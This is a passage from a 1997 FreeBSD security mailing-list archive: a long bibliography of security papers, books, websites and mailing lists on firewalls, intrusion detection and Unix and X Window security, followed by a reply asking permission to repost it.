http://seclab.cs.ucdavis.edu/papers/bd96.ps A Methodology for Testing Intrusion Detection Systems. N. F. Puketza, K. Zhang, M. Chung, B. Mukherjee, R. A. Olsson. IEEE Transactions on Software Engineering, Vol.22, No.10, October 1996. http://seclab.cs.ucdavis.edu/papers/tse96.ps GrIDS -- A Graph-Based Intrusion Detection System for Large Networks. S. Staniford-Chen, S. Cheung, R. Crawford, M. Dilger, J. Frank, J. Hoagland, K. Levitt, C. Wee, R. Yip, D. Zerkle. The 19th National Information Systems Security Conference. http://seclab.cs.ucdavis.edu/papers/nissc96.ps NetKuang--A Multi-Host Configuration Vulnerability Checker. D. Zerkle, K. Levitt , Proc. of the 6th USENIX Security Symposium. San Jose, California. 1996. http://seclab.cs.ucdavis.edu/papers/zl96.ps Simulating Concurrent Intrusions for Testing Intrusion Detection Systems: Parallelizing Intrusions. M. Chung, N. Puketza, R.A. Olsson, B. Mukherjee. Proc. of the 1995 National Information Systems Security Conference. Baltimore, Maryland. 1995. http://seclab.cs.ucdavis.edu/papers/cpo95.ps Holding Intruders Accountable on the Internet. S. Staniford-Chen, and L.T. Heberlein. Proc. of the 1995 IEEE Symposium on Security and Privacy, Oakland, CA, 8-10 May 1995. http://seclab.cs.ucdavis.edu/~stanifor/seclab_only/notes/ieee_conf_94/revision/submitted.ps Machine Learning and Intrusion Detection: Current and Future Directions. J. Frank. Proc. of the 17th National Computer Security Conference, October 1994. Another Intrusion Detection Bibliography. http://doe-is.llnl.gov/nitb/refs/bibs/bib1.html Intrusion Detection Bibliography. http://www.cs.purdue.edu/coast/intrusion-detection/ids_bib.html Intrusion Detection Systems. This list concentrates primarily on discussions about methods of intrusion or intrusion detection. Target: majordomo@uow.edu.au Command: subscribe ids (In BODY of message) The WWW Security List. Members of this list discuss all techniques to maintain (or subvert) WWW security. (Things involving secure methods of HTML, HTTP and CGI.) Target: www-security-request@nsmx.rutgers.edu Command: SUBSCRIBE www-security your_email_address (In BODY of message) The Sneakers List. This list discusses methods of circumventing firewall and general security. This list is reserved for lawful tests and techniques. Target: majordomo@CS.YALE.EDU Command: SUBSCRIBE Sneakers (In BODY of message) The Secure HTTP List. This list is devoted to the discussion of S-HTTP and techniques to facilitate this new form of security for WWW transactions. Target: shttp-talk-request@OpenMarket.com Command: SUBSCRIBE (In BODY of message) The NT Security List. This list is devoted to discussing all techniques of security related to the Microsoft Windows NT operating system. (Individuals also discuss security aspects of other Microsoft operating systems as well.) Target: request-ntsecurity@iss.net Command: subscribe ntsecurity (In BODY of message) The Bugtraq List. This list is for posting or discussing bugs in various operating systems, those UNIX is the most often discussed. The information here can be quite explicit. If you are looking to learn the fine aspects (and cutting edge news) in UNIX security, this list is for you. Target: LISTSERV@NETSPACE.ORG Command: SUBSCRIBE BUGTRAQ(In BODY of message) Password Security: A Case History. Robert Morris and Ken Thompson. http://www.sevenlocks.com/papers/password/pwstudy.ps Site Security Handbook (update and Idraft version; June 1996, CMU. Draft-ietf-ssh-handbook-03.txt.) Barbara Fraser. http://www.internic.net/internet-drafts/draft-ietf-ssh-handbook-03.txt. Improving the Security of Your Site by Breaking Into It. Dan Farmer & Wietse Venema. (1995) http://www.craftwork.com/papers/security.html. Making Your Setup More Secure. NCSA Tutorial Pages. http://hoohoo.ncsa.uiuc.edu/docs/tutorials/security.html. The Secure HyperText Transfer Protocol. E. Rescorla, A. Schiffman (EIT) July 1995. http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt. The SSL Protocol. (IDraft) Alan O. Freier & Philip Karlton (Netscape Communications) with Paul C. Kocher. http://home.netscape.com/eng/ssl3/ssl-toc.html. Writing, Supporting, and Evaluating TripWire. A Publicly Available Security Tool; Kim/Spafford. http://www.raptor.com/lib/9419.ps The Design and Implementation of TripWire. A Filesystem Integrity Checker; Kim/Spafford. Location: http://www.raptor.com/lib/9371.ps X Window System Security. Ben Gross & Baba Buehler. Beckman Institute System Services. http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html. Last Apparent Date of Modification: January 11, 1996. On the (in)Security of the Windowing System X. Marc VanHeyningen of Indiana University. http://www.cs.indiana.edu/X/security/intro.html. September 14, 1994. Security in the X11 Environment. Pangolin. University of Bristol, UK. January, 1995. http://sw.cse.bris.ac.uk/public/Xsecurity.html. Security in Open Systems. (NIST) John Barkley, Editor. (With Lisa Carnahan, Richard Kuhn, Robert Bagwill, Anastase Nakassis, Michael Ransom, John Wack, Karen Olsen, Paul Markovitz and Shu-Jen Chang.) US Department of Commerce. Section: The X Window System: Bagwill, Robert. http://csrc.ncsl.nist.gov/nistpubs/800-7/node62.html#SECTION06200000000000000000. Security Enhancements of the DEC MLS+ System; The Trusted X Window System. November, 1995. http://ftp.digital.com/pub/Digital/info/SPD/46-21-XX.txt Evolution of a Trusted B3 Window System Prototype. J. Epstein, J. Mc Hugh, R.Psacle, C. Martin, D. Rothnie, H. Orman, A. Marmor-Squires, M.Branstad, and B. Danner, , In Proceeding of the 1992 IEEE Symposium on Security and Privacy, 1992. A Prototype B3 Trusted X Window System. J. Epstein, J. Mc Hugh, R. Pascale, H. Orman, G. Benson, C.Martin, A. Marmor-Squires, B.Danner, and M. Branstad, The Proceedings of the 7th Computer Security Applications Conference, December, 1991. Improving X Windows Security. UNIX World, (Volume IX, Number 12) December 1992. Linda Mui. Security and the X Window System. UNIX World, 9(1), p. 103. January 1992. Dennis Sheldrick. The X Window System. Scheifler, Robert W. & Gettys, Jim. ACM Transactions on Graphics. Vol.5, No. 2 (April 1986), pp. 79-109. http://www.acm.org/pubs/toc/Abstracts/0730-0301/24053.html. X Window Terminals. Digital Technical Journal of Digital Equipment Corporation, 3(4), pp. 26-36, Fall 1991. Björn Engberg and Thomas Porcher. ftp://ftp.digital.com/pub/Digital/info/DTJ/v3n4/X_Window_Terminals_01jul1992DTJ402P8.ps. Information Security: Computer Attacks at Department of Defense Pose Increasing Risks; General Accounting Office. Report on Failed Security at US Defense Sites. http://www.epic.org/security/GAO_OMB_security.html Defense Directive 5200.28. "Security requirements for Automated Information Systems." Document describing some antiquated government standards for security. http://140.229.1.16:9000/htdocs/teinfo/directives/soft/5200.28.html The Evaluated Products List (EPL). A list of products that have been evaluated for security ratings, based on DOD guidelines. http://www.radium.ncsc.mil/tpep/epl/index.html INTERNIC, or the Network Information Center. INTERNIC provides comprehensive databases on networking information. These databases contain the larger portion of collected knowledge on the design and scope of the Internet. (Of main importance here is the database of RFC documents.) http://ds0.internic.net/ds/dspg1intdoc.html The Rand Corporation. Security resources of various sorts. Also: very engrossing "early" documents on the Internet’s design. http://www.rand.org/publications/electronic/ Connected: An Internet Encyclopedia. (Incredible on-line resource for RFC documents and related information, apparently painstaking translated into HTML.) http://www.freesoft.org/Connected/RFC/826/ The Computer Emergency Response Team. (CERT) An organization that assists sites in responding to network security violations, break-ins and so forth. Great source of information, particularly for vulnerabilities. http://www.cert.org. Security Survey of Key Internet Hosts & Various Semi-Relevant Reflections. D. Farmer. Fascinating independent stud conducted by one of the authors of the now famous SATAN program. The survey involved approximately 2200 sites. The results are disturbing. http://www.trouble.org/survey/ CIAC. (U.S. Department of Energy's Computer Incident Advisory Capability.) The CIAC provides computer security services to employees and contractors of the United States Department of Energy, but the site is open to the public as well. There are many tools and documents at this location. http://ciac.llnl.gov/ The National Computer Security Association. This site contains a great deal of valuable security information, including reports, papers, advisories and analyses of various computer security products and techniques. http://www.ncsa.com/ Short Courses in Information Systems Security at George Mason University. This site contains information about security courses. Moreover, there are links a comprehensive bibliography of various security related documents. http://www.isse.gmu.edu:80/~gmuisi/ NCSA RECON. Spooks on the Net. The National Computer Security Association’s "special" division. They offer a service where one can search through thousands of downloaded messages passed amongst hackers and crackers on BBS boards and the Internet. An incredible security resource, but a commercial one. http://www.isrecon.ncsa.com/public/faq/isrfaq.htm Lucent Technologies. Courses on security from the folks who really know security. http://www.attsa.com/ Massachusetts Institute of Technology distribution site for United States residents for Pretty Good Privacy (PGP). PGP provides some of the most powerful, military grade encryption currently available. http://web.mit.edu/network/pgp.html The Anonymous Remailer FAQ. A document that covers all aspects of anonymous remailing techniques and tools. http://www.well.com/user/abacard/remail.html The Anonymous Remailer List. A comprehensive but often changing (dynamic) list of anonymous remailers http://www.cs.berkeley.edu/~raph/remailer-list.html Microsoft ActiveX Security. This page addresses the security features of ActiveX. http://www.microsoft.com/intdev/signcode/ Purdue University COAST Archive. One of the more comprehensive security sites, containing many tools and documents of deep interest within the security community. http://www.cs.purdue.edu//coast/archive/ Raptor Systems. Makers of one of the better firewall products on the Net have established a fine security library. http://www.raptor.com/library/library.html The Risks Forum. A moderated digest of security and other risks in computing. A great resource that is also searchable. You can tap the better security minds on the Net. http://catless.ncl.ac.uk/Risks FIRST. (Forum of Incident Response and Security Teams). A conglomeration of many organizations undertaking security measures on the Internet. A powerful organization and good starting place for sources. http://www.first.org/ The CIAC Virus Database. The ultimate virus database on the Internet. An excellent resource to learn about various viruses that can effect your platform. http://ciac.llnl.gov/ciac/CIACVirusDatabase.html Information Warfare and Information Security on the Web. A comprehensive lost of links and other resources concerning Information Warfare over the Internet. http://www.fas.org/irp/wwwinfo.html Criminal Justice Studies of the Law Faculty of University of Leeds, The United Kingdom. Site with interesting information on cryptography and civil liberties. http://www.leeds.ac.uk/law/pgs/yaman/cryptog.htm. Federal Information Processing Standards Publication documents. (Government guidelines.) National Institute of Standards and Technology reports on DES encryption and related technologies. http://csrc.nist.gov/fips/fips46-2.txt Wordlists available at NCSA and elsewhere. (For use in testing the strength of, or "cracking" UNIX passwords.) http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html. Department of Defense Password Management Guideline. (Treatment of password security in classified environments.) http://www.alw.nih.gov/Security/FIRST/papers/password/dodpwman.txt Dr. Solomon’s. A site filled with virus information. Anyone concerned with viruses (or anyone who just wants to know more about virus technology,) should visit Dr. Solomon’s site. http://www.drsolomon.com/vircen/allabout.html The Seven Locks server. An eclectic collection of security resources, including a number of papers that cannot be found elsewhere! http://www.sevenlocks.com/CIACA-10.htm.[m1] S/Key informational page. Provides information on S/Key and use of one time passwords in authentication. http://medg.lcs.mit.edu/people/wwinston/skey-overview.html. A page devoted to ATP, the "Anti-Tampering Program". (In some ways, similar to Tripwire or Hobgoblin.) http://www.cryptonet.it/docs/atp.html Bugtraq Archives. An archive of the popular mailing list, Bugtraq. This is significant because Bugtraq is one of the most reliable source for up-to-date reports on new found vulnerabilities in UNIX (and at times, other operating systems.) http://geek-girl.com/bugtraq/ Wang Federal. This company produces very high quality security operating systems and other security solutions. They are the leader in TEMPEST technology. http://www.wangfed.com The Center for Secure Information Systems. This site, affiliated with the Center at George Mason University, has some truly incredible papers. There is much research going on here; research of a cutting edge nature. The link below send you directly to the publications page, but you really should explore the entire site. http://www.isse.gmu.edu/~csis/publication.html SRI International. Some very highbrow technical information. The technical reports here are of extreme value. However, you must have at least a fleeting background in security to even grasp some of the concepts. Nevertheless, a great resource. http://www.sri.com/ The Security Reference Index. This site, maintained by the folks at telstra.com, is a comprehensive pointer page to many security resources. http://www.telstra.com.au/info/security.html Wietse Venema’s Tools Page. This page, Maintained by Wietse Venema (co-author of SATAN and author of TCP_Wrapper and many, other security tools), filled papers, tools and general information. It is a must-visit for any UNIX system administrator. ftp://ftp.win.tue.nl/pub/security/index.html United States. Congress. House. Committee on Science, Space, and Technology. Subcommittee on Science. Internet security : Hearing Before the Subcommittee on Science of the Committee on Science, Space, and Technology. U.S. House of Representatives, One Hundred Third Congress, second session, March 22, 1994. Washington. U.S. G.P.O. For sale by the U.S. G.P.O., Supt. of Docs., Congressional Sales Office, 1994. UNIX Unleashed. SAMS Publishing, 1994. ISBN: 0-672-30402-3. Internet QuickKIT. Brad Miser. HAYDEN. ISBN: 1568302401 Bots and Other Internet Beasties. SAMS.NET. Joseph Williams. ISBN: 1575210169 (1996) The Internet Unleashed 1996. SAMS.NET. SAMS Development Group. ISBN: 157521041X. (1995) Microsoft Internet Information Server 2 Unleashed. Arthur Knowles. SAMS.NET. ISBN: 1575211092. (1996) Designing and Implementing Microsoft Internet Information Server. SAMS.NET. ISBN: 1575211688. (1996) Internet Research Companion. Que Education and Training. Geoffrey McKim. ISBN: 1575760509. (1996) An Interactive Guide to the Internet. Que Education and Training. J. Michael BLocher, Vito Amato & Jon Storslee. ISBN: 1575763540. (1996) Internet Security for Business. New York. Wiley, 1996. xi, 452 p. : ill. ; 24 cm. LC CALL NUMBER: HD30.38 .I57 1996 Managing Windows NT Server 4. NRP. Howard F. Hilliker. ISBN: 1562055763. (1996) Internet 1997 Unleashed, Second Edition. SAMS.NET. Jill Ellsworth, Billy Barron, et al. ISBN: 1575211858. (1996) Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP. ISBN: 1562056018. (1996) Apache Server Survival Guide. SAMS.NET. Manuel Alberto Ricart. ISBN: 1575211750. (1996) Internet Firewalls and Network Security, Second Edition. NRP. Chris Hare and Karanjit S. Siyan, Ph.D. ISBN: 1562056328. (1996) PC Week Intranet and Internet Firewalls Strategies. ZDPRESS. Ed Amoroso & Ronald Sharp. ISBN: 1562764225. (1996) Internet Security Professional Reference. NRP. Chris Hare, et al. ISBN: 1562055577. (1996) NetWare Security. NRP. William Steen. ISBN: 1562055453. (1996) Internet Security Resource Library. NRP. Box-set. ISBN: 1562055062. (1996) LINUX System Administrator's Survival Guide. SAMS. Timothy Parker, Ph. D. ISBN: 0672308509. (1996) Internet Commerce. NRP. Andrew Dahl and Leslie Lesnick. ISBN: 1562054961. (1995) Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP. ISBN: 1562056018. (1996) E-Mail Security: How To Keep Your Electronic Messages Private. Bruce Schneier. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158. ISBN: 0-471-05318-X Protection and Security on the Information Superhighway. Frederick B. Cohen. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158. ISBN: 0-471-11389-1 Firewalls and Internet Security: Repelling the Wily Hacker. William R. Cheswick and Steven M. Bellovin. Addison-Wesley Publishing Co. 1 Jacob Way Reading, MA 01867. ISBN: 0-201-63357-4 Practical UNIX & Internet Security, 2nd Edition. Simson Garfinkel & Gene Spafford. 2nd Edition April 1996. 1-56592-148-8. UNIX System Security. David A. Curry. Addison Wesley Publishing Company, Inc. 1992. ISBN 0-201-56327-4 Secure UNIX. Samuel Samalin. McGraw Hill. December 1996. ISBN: 0070545545 Security (Openframework Systems Architecture). Belinda Fairthorne. Prentice Hall. Publication date: March 1993. ISBN: 0136306586 The Underground Guide to UNIX : Slightly Askew Advice from a UNIX Guru. John Montgomery. Addison-Wesley Pub Co. 1995. ISBN: 0201406535 UNIX Installation Security and Integrity. David Ferbrache, Gavin Shearer. Prentice Hall. 1993. ISBN: 0130153893 UNIX Security : A Practical Tutorial (UNIX/C). N. Derek Arnold. McGraw-Hill. 1993. ISBN: 0070025606 UNIX System Security Essentials. Christoph Braun, Siemens Nixdorf. Addison-Wesley Pub Co. 1995. IBN: 0201427753 UNIX System Security : How to Protect Your Data and Prevent Intruders. Rik Farrow, Rick Farrow. Addison-Wesley Pub Co. 1991. ISBN: 0201570300 UNIX Security Symposium IV Proceedings/October 4-6, 1993 Santa Clara, California, USA. Usenix Assoc. ISBN: 1880446553 -- -- Phil -[ Philippe Regnauld / Systems Administrator / regnauld@prosa.dk ]- -[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]- From owner-freebsd-security Fri Aug 1 09:47:41 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA28644 for security-outgoing; Fri, 1 Aug 1997 09:47:41 -0700 (PDT) Received: from www.buffalostate.edu (hummel@www.buffalostate.edu [136.183.2.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA28639 for ; Fri, 1 Aug 1997 09:47:27 -0700 (PDT) Received: from localhost (hummel@localhost) by www.buffalostate.edu (8.8.5/8.8.5) with SMTP id MAA32164; Fri, 1 Aug 1997 12:47:10 -0400 Date: Fri, 1 Aug 1997 12:47:10 -0400 (EDT) From: Dave Hummel To: Philippe Regnauld cc: freebsd-security@FreeBSD.ORG Subject: Re: Security books (was: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <19970731221445.04992@deepo.prosa.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id JAA28640 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk This is a great list! Can I post this on my web page as is (with names included)? I really want to give credit where credit is due. ------------------------------------------------------------------------ When you get to the end of your rope, tie a knot and hang on. And swing! ------------------------------------------------------------------------ On Thu, 31 Jul 1997, Philippe Regnauld wrote: > Jordan K. Hubbard writes: > > > > The body of available UNIX documentation out there, much of which is > > listed in the glossary of the FreeBSD handbook, is about as good as it > > gets and it isn't all that bad - even as complete a "checklist" as I > > could imagine would end up being largely replicating the docs which > > these books currently provide. > > Books have been mentioned several times -- I can only agree > with Jordan and say "read 'em" -- so here's a list that's just > been forwarded to me from osiris@pacificnet.net (cf. Bugtraq and > BoS) -- hey, Vinnie, read up :-) > > Internet Firewalls and Network Security. Chris Hare, Karanjit > Siyan. 2nd Edition. New Riders Pub. August 1,1996. ISBN: > 1562056328 > > Internet Firewalls. Scott Fuller, Kevin Pagan. Ventana Communications > Group Inc. January 1997. ISBN: 1566045061 > > Building Internet Firewalls. D. Brent Chapman, Elizabeth D. Zwicky. > O'Reilly & Associates (ORA). September 1,1995. ISBN: 1565921240 > > Firewalls and Internet Security : Repelling the Wily Hacker. > Addison-Wesley Professional Computing. William R. Cheswick, Steven M. > Bellovin. June 1,1994. ISBN: 0201633574 > Actually Useful Internet Security Techniques. Larry J. Hughes, Jr. New > Riders Publishing, ISBN 1-56205-508-9 > > PCWEEK Intranet and Internet Firewall Strategies. Ed Amoroso & Ron > Sharp, Ziff Davies > > Internet Security Resource Library : Internet Firewalls and Network > Security, Internet Security Techniques, Implementing Internet Security. > New Riders. December 1995. ISBN: 1562055062 > > Firewalls FAQ. Marcus J. Ranum. > http://www.cis.ohio-state.edu/hypertext/faq/usenet/firewalls-faq/faq.html > > NCSA Firewall Policy Guide. Compiled by Stephen Cobb, Director of > Special Projects. National Computer Security Association. > http://www.ncsa.com/fwpg_p1.html > > Comparison: Firewalls. June 17, 1996. LanTimes. Comprehensive comparison > of a wide variety of firewall products. > http://www.lantimes.com/lantimes/usetech/compare/pcfirewl.html > > There Be Dragons. Steven M. Bellovin. "To appear in Proceedings of the > Third Usenix UNIX Security Symposium, Baltimore, September 1992." AT&T > Bell Laboratories, Murray Hill, NJ. August 15, 1992 > > Rating of application layer proxies. Michael Richardson. Wed Nov 13 > 13:54:09 EST 1996. > http://www.sandelman.ottawa.on.ca/SSW/proxyrating/proxyrating.html > > Keeping your site comfortably secure: An Introduction to Internet > Firewalls. John P. Wack and Lisa J. Carnahan. National Institute > ofStandards and Technology. John Wack Thursday, Feb 9 18:17:09 EST 1995. > http://csrc.ncsl.nist.gov/nistpubs/800-10/ > > SQL*Net and Firewalls. David Sidwell & Oracle Corporation. > http://www.zeuros.co.uk/firewall/library/oracle-and-fw.pdf > > Covert Channels in the TCP/IP Protocol Suite. Craig Rowland. Rotherwick > & Psionics Software Systems Inc. > http://www.zeuros.co.uk/firewall/papers.htm > > If You Can Reach Them, They Can Reach You. A PC Week Online Special > Report, June 19, 1995. William Dutcher. > http://www.pcweek.com/sr/0619/tfire.html > > Packet Filtering for Firewall Systems. February 1995. CERT (and Carnegie > Mellon University.) ftp://info.cert.org/pub/tech_tips/packet_filtering > > Network Firewalls. Steven M. Bellovin and William R. Cheswick. > ieeecm, 32(9), pp. 50-57, September 1994. > > Session-Layer Encryption. Matt Blaze and Steve Bellovin. Proceedings of > the USENIX Security Workshop, June 1995. > > A Network Perimeter With Secure External Access. An extraordinary paper > that details the implementation of a firewall purportedly at the White > House. (Yes, the one at 1600 Pennsylvania Avenue.) Frederick M. Avolio; > Marcus J. Ranum. (Trusted Information Systems, Incorporated). Glenwood, > MD. January 25, 1994. > http://www.alw.nih.gov/Security/FIRST/papers/firewall/isoc94.ps > > > Packets Found on an Internet. Interesting Analysis of packets appearing > at the Application Gateway of AT&T. Steven M. Bellovin. Lambda. August > 23, 1993. ftp://ftp.research.att.com/dist/smb/packets.ps > > Using Screend to implement TCP/IP Security Policies. Jeff Mogul. > Rotherwick and Digital. > http://www.zeuros.co.uk/firewall/library/screend.ps > > Firewall Application Notes. Good document that starts out by describing > how to build a firewall. It also addresses application proxies, Sendmail > in relation to firewalls and the characteristics of a bastion host. > Livingston Enterprises, Inc. > http://www.telstra.com.au/pub/docs/security/firewall-1.1.ps.Z > > X Through the Firewall, and Other Application Relays. Treese/Wolman > Digital Equipment Corp. Cambridge Research Lab. (October, 1993?). > ftp://crl.dec.com/pub/DEC/CRL/tech-reports/93.10.ps.Z > > Intrusion Protection for Networks 171. BYTE Magazine. April, 1995. > > Benchmarking Methodology for Network Interconnect Devices. RFC 1944. S. > Bradner & J. McQuaid. ftp://ds.internic.net/rfc/rfc1944.txt > > Firewall Performance Measurement Techniques: A Scientific Approach. > Marcus Ranum. February 4, 1996 (Last Known Date of Mod.) > http://www.v-one.com/pubs/perf/approaches.htm > > WARDING OFF THE CYBERSPACE INVADERS. Business Week. 03/13/95. Amy > Cortese in New York, with bureau reports > > Vulnerability in Cisco Routers used as Firewalls. Computer Incident > Advisory Capability Advisory: Number D-15. May 12, 1993 1500 PDT. > http://ciac.llnl.gov/ciac/bulletins/d-15.shtml > > WAN-Hacking with AutoHack - Auditing Security behind the Firewall. Alec > D.E. Muffett. (network Security Group, Sun Microsystems, United > Kingdom.) Written by the author of Crack, the famous password cracking > program. Extraordinary document that deals with methods of auditing > security from behind a firewall. (And auditing of a network so large > that it contained tens of thousands of hosts!) June 6, 1995. > http://www.telstra.com.au/pub/docs/security/muffett-autohack.ps > > Windows NT Firewalls Are Born. February 4, 1997. PC Magazine. > http://www.pcmagazine.com/features/firewall/_open.htm > Group of 15 Firewalls Hold Up Under Security Scrutiny. Stephen > Lawson June 1996. > InfoWorld. > http://www.infoworld.com/cgi-bin/displayStory.pl?96067.firewall.htm > > IP v6 Release and Firewalls. Uwe Ellermann. 14th Worldwide Congress on > Computer and Communications Security. Protection, pp. 341-354, June > 1996. > > The SunScreen Product Line Overview. (Sun Microsystems.) > http://www.sun.com/security/overview.html > > Product Overview for IBM Internet Connection Secured Network Gateway for > AIX, Version 2.2. (IBM Firewall Information.) > http://www.ics.raleigh.ibm.com/firewall/overview.htm > > The Eagle Firewall Family. (Raptor Firewall Information.) > http://www.raptor.com/products/brochure/40broch.html > > Secure Computing Firewall™ for NT. Overview. (Secure Computing). > http://www.sctc.com/NT/HTML/overview.html > > Check Point FireWall-1 Introduction. (Checkpoint Technologies Firewall > Information.) http://www.checkpoint.com/products/firewall/intro.html > > Cisco PIX Firewall. (Cisco Systems Firewall Information.) > http://www.cisco.com/univercd/data/doc/cintrnet/prod_cat/pcpix.htm > > Protecting the Fortress From Within and Without. R. Scott Raynovich. > April 1996. LAN Times. http://www.wcmh.com/lantimes/96apr/604c051a.html > > Internet Firewalls: An Introduction. Firewall White Paper. NMI Internet > Expert Services. PO Box 8258. Portland, ME 04104-8258. > http://www.netmaine.com/netmaine/whitepaper.html > > Features of the Centri(TM) Firewall. (Centri Firewall Information.) > http://www.gi.net/security/centrifirewall/features.html > > Five Reasons Why an Application Gateway is the Most Secure Firewall. > (Global Internet.) > http://www.gi.net/security/centrifirewall/fivereasons.html > > An Introduction to Intrusion Detection. Aurobindo Sundaram. Last > Apparent Date of Modification: October 26, 1996. > http://www.techmanager.com/nov96/intrus.html > > Intrusion Detection for Network Infrastructures. S. Cheung, K.N. Levitt, > C. Ko. 1995 IEEE Symposium on Security and Privacy, Oakland, CA, May > 1995. http://seclab.cs.ucdavis.edu/papers/clk95.ps > > Network Intrusion Detection. Biswanath Mukherjee and L. Todd Heberlein > and Karl N. Levitt. IEEE Network, May 1994. > > Fraud and Intrusion Detection in Financial Information Systems. S. > Stolfo and P. Chan and D. Wei and W. Lee and A. Prodromidis. 4th > ACM Computer and Communications Security Conference, 1997. > http://www.cs.columbia.edu/~sal/hpapers/acmpaper.ps.gz > > A Pattern-Oriented Intrusion-Detection Model and Its Applications. > Shiuhpyng W. Shieh and Virgil D. Gligor. Research in Security and > Privacy, IEEECSP, May 1991. > > Detecting Unusual Program Behavior Using the Statistical Component of > the Next-generation Intrusion Detection Expert System (NIDES). Debra > Anderson, Teresa F. Lunt, Harold Javitz, Ann Tamaru, and Alfonso Valdes. > SRI-CSL-95-06, May 1995. (Available in hard copy only.) Abstract: > http://www.csl.sri.com/tr-abstracts.html#csl9506 > > Intrusion Detection Systems (IDS): A Survey of Existing Systems and A > Proposed Distributed IDS Architecture. S.R. Snapp, J. Brentano, G.V. > Dias, T.L. Goan, T. Grance, L.T. Heberlein, C. Ho, K.N. Levitt, B. > Mukherjee, D.L. Mansur, K.L. Pon, and S.E. Smaha. Technical Report > CSE-91-7, Division of Computer Science, University of California, Davis, > February 1991. http://seclab.cs.ucdavis.edu/papers/bd96.ps > > A Methodology for Testing Intrusion Detection Systems. N. F. Puketza, K. > Zhang, M. Chung, B. Mukherjee, R. A. Olsson. IEEE Transactions on > Software Engineering, Vol.22, No.10, October 1996. > http://seclab.cs.ucdavis.edu/papers/tse96.ps > > GrIDS -- A Graph-Based Intrusion Detection System for Large Networks. S. > Staniford-Chen, S. Cheung, R. Crawford, M. Dilger, J. Frank, J. > Hoagland, K. Levitt, C. Wee, R. Yip, D. Zerkle. The 19th National > Information Systems Security Conference. > http://seclab.cs.ucdavis.edu/papers/nissc96.ps > > NetKuang--A Multi-Host Configuration Vulnerability Checker. D. Zerkle, > K. Levitt , Proc. of the 6th USENIX Security Symposium. San Jose, > California. 1996. http://seclab.cs.ucdavis.edu/papers/zl96.ps > > Simulating Concurrent Intrusions for Testing Intrusion Detection > Systems: Parallelizing Intrusions. M. Chung, N. Puketza, R.A. Olsson, B. > Mukherjee. Proc. of the 1995 National Information Systems Security > Conference. Baltimore, Maryland. 1995. > http://seclab.cs.ucdavis.edu/papers/cpo95.ps > > Holding Intruders Accountable on the Internet. S. Staniford-Chen, and > L.T. Heberlein. Proc. of the 1995 IEEE Symposium on Security and > Privacy, Oakland, CA, 8-10 May 1995. > http://seclab.cs.ucdavis.edu/~stanifor/seclab_only/notes/ieee_conf_94/revision/submitted.ps > > Machine Learning and Intrusion Detection: Current and Future Directions. > J. Frank. Proc. of the 17th National Computer Security Conference, > October 1994. > > Another Intrusion Detection Bibliography. > http://doe-is.llnl.gov/nitb/refs/bibs/bib1.html > > Intrusion Detection Bibliography. > http://www.cs.purdue.edu/coast/intrusion-detection/ids_bib.html > > Intrusion Detection Systems. This list concentrates primarily on > discussions about methods of intrusion or intrusion detection. > Target: majordomo@uow.edu.au > Command: subscribe ids (In BODY of message) > > The WWW Security List. Members of this list discuss all techniques to > maintain (or subvert) WWW security. (Things involving secure methods of > HTML, HTTP and CGI.) > Target: www-security-request@nsmx.rutgers.edu > Command: SUBSCRIBE www-security your_email_address (In BODY of message) > > The Sneakers List. This list discusses methods of circumventing firewall > and general security. This list is reserved for lawful tests and > techniques. > Target: majordomo@CS.YALE.EDU > Command: SUBSCRIBE Sneakers (In BODY of message) > > The Secure HTTP List. This list is devoted to the discussion of S-HTTP > and techniques to facilitate this new form of security for WWW > transactions. > Target: shttp-talk-request@OpenMarket.com > Command: SUBSCRIBE (In BODY of message) > > The NT Security List. This list is devoted to discussing all techniques > of security related to the Microsoft Windows NT operating system. > (Individuals also discuss security aspects of other Microsoft operating > systems as well.) > Target: request-ntsecurity@iss.net > Command: subscribe ntsecurity (In BODY of message) > > The Bugtraq List. This list is for posting or discussing bugs in various > operating systems, those UNIX is the most often discussed. The > information here can be quite explicit. If you are looking to learn the > fine aspects (and cutting edge news) in UNIX security, this list is for > you. > Target: LISTSERV@NETSPACE.ORG > Command: SUBSCRIBE BUGTRAQ(In BODY of message) > > Password Security: A Case History. Robert Morris and Ken Thompson. > http://www.sevenlocks.com/papers/password/pwstudy.ps > > Site Security Handbook (update and Idraft version; June 1996, CMU. > Draft-ietf-ssh-handbook-03.txt.) Barbara Fraser. > http://www.internic.net/internet-drafts/draft-ietf-ssh-handbook-03.txt. > > Improving the Security of Your Site by Breaking Into It. Dan Farmer & > Wietse Venema. (1995) http://www.craftwork.com/papers/security.html. > > Making Your Setup More Secure. NCSA Tutorial Pages. > http://hoohoo.ncsa.uiuc.edu/docs/tutorials/security.html. > > The Secure HyperText Transfer Protocol. E. Rescorla, A. Schiffman (EIT) > July 1995. > http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt. > > The SSL Protocol. (IDraft) Alan O. Freier & Philip Karlton (Netscape > Communications) with Paul C. Kocher. > http://home.netscape.com/eng/ssl3/ssl-toc.html. > > Writing, Supporting, and Evaluating TripWire. A Publicly Available > Security Tool; Kim/Spafford. http://www.raptor.com/lib/9419.ps > > The Design and Implementation of TripWire. A Filesystem Integrity > Checker; Kim/Spafford. Location: http://www.raptor.com/lib/9371.ps > > X Window System Security. Ben Gross & Baba Buehler. Beckman Institute > System Services. > http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html. > Last Apparent Date of Modification: January 11, 1996. > > On the (in)Security of the Windowing System X. Marc VanHeyningen of > Indiana University. http://www.cs.indiana.edu/X/security/intro.html. > September 14, 1994. > > Security in the X11 Environment. Pangolin. University of Bristol, UK. > January, 1995. 